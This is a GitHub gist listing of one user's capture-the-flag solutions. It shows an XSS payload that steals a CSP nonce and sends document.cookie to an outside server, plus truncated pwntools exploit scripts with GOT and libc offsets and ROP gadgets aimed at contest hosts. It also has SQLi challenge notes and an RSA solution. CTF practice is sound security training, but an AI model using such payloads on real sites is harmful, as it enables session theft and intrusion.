View keybase.md

Keybase proof

I hereby claim:

  • I am rekkusu on github.
  • I am xrekkusu (https://keybase.io/xrekkusu) on keybase.
  • I have a public key ASDikKa6pgDX2d4GPEgqRbS4aQZnkti0ROig4psGPje8bAo

To claim this, I am signing this object:

@rekkusu
rekkusu / getflag.html
Created May 5, 2019
TSG CTF 2019 / BAD NONCE 1 & 2
View getflag.html
<script>
fetch('/nonce').then(r => r.text()).then(nonce => {
document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>');
});
</script>
@rekkusu
rekkusu / chat.py
Last active Dec 12, 2016
[SECCON 2016 Online] chat 500
View chat.py
from pwn import *
import string
strcmp_got = 0x603050
free_libc = 0x222c40
free_got = 0x603018
strchr_libc = 0x86d40
strchr_got = 0x603038
#system_libc = 0x46590
system_libc = 0xe5765 # One gadget RCE
@rekkusu
rekkusu / exploit.py
Created Sep 21, 2016
PlaidCTF 2015 - tp
View exploit.py
from pwn import *
# local libc
libc_data = 0x1bb000
libc_main_arena = libc_data + 0x203760
libc_environ = libc_data + 0x2064a0
libc_gadget = {
'poprdi': 0x22b1a,
'poprsi': 0x24805,
'poprdx': 0x1b8e,
@rekkusu
rekkusu / SECCON2015 final 問題解説メモ
Created Jan 31, 2016
Notes on the contents of the slides in which tessy gave the explanations
View SECCON2015 final 問題解説メモ
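[intercollege]
1. WebServiceX
Article-posting bulletin board
SQLi
Passwords in plain view
Extract the delete key and delete articles
2. SECCON Horse Racing
Server running on node.js
Attack the SQLi present in various places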
@rekkusu
rekkusu / rhinoxorus.py
Created Sep 20, 2015
[CSAW CTF 2015] Exploit 500 rhinoxorus
View rhinoxorus.py
from pwn import *
ret_addr = 0x8056afa
pop2ret = 0x80578fa
leaveret = 0x804889f
password = 0x805f0c0
sock_send = 0x804884b
s = remote('54.152.37.20', 24242)
payload = [
@rekkusu
rekkusu / autobots.py
Created Sep 20, 2015
[CSAW CTF 2015] Exploit 350 autobots
View autobots.py
from pwn import *
import re
import os
import time
import sys
REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'
csu_pop = 0x4008ca
csu_call = 0x4008b0
@rekkusu
rekkusu / 0_reuse_code.js
Last active Sep 2, 2015
Here are some things you can do with Gists in GistBox.
View 0_reuse_code.js
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console
@rekkusu
rekkusu / myrsa.py
Created Aug 31, 2015
TDUCTF 2015 Crypto500 My RSA
View myrsa.py
A = 2**127 - 1
B = 2**521 - 1
M = 2**607 - 1
e = 2 ** 16 + 1
N = 63818680202675589216815967315756339566489246779116223051722243409259352306082269405584940079271925323037734694881017657210693291225811959344097136283943773119253977386753351100049200282621303479907450098708525270143513533970091975470643256818850535284677109438825447301648598261836252545636152169068763895406856318437232759172916712871952129664784095465920918889209
# Mathematica
# X = Mod[FindInstance[Reduce[A*x^2 + B*x - NN + k*M == 0, {x, k}, Integers], {x, k}][[1]][[1]][[2]], M]
X = 191381205906541365810282593776863206661156657204872893015293939948869850881931905283828875884014270971209197231695869794928684848246961454267088835714426435068255775651115299873104893
@rekkusu
rekkusu / charlotte.py
Last active Aug 31, 2015
TDUCTF 2015 Pwnable writeup
View charlotte.py
from pwn import *
from libformatstr import FormatStr
import time
s = remote('crackme.sakura.tductf.org', 10773)
read_secret = 0x0804875d
strlen_got = 0x8049138
exit_got = 0x804912c
puts_plt = 0x8048580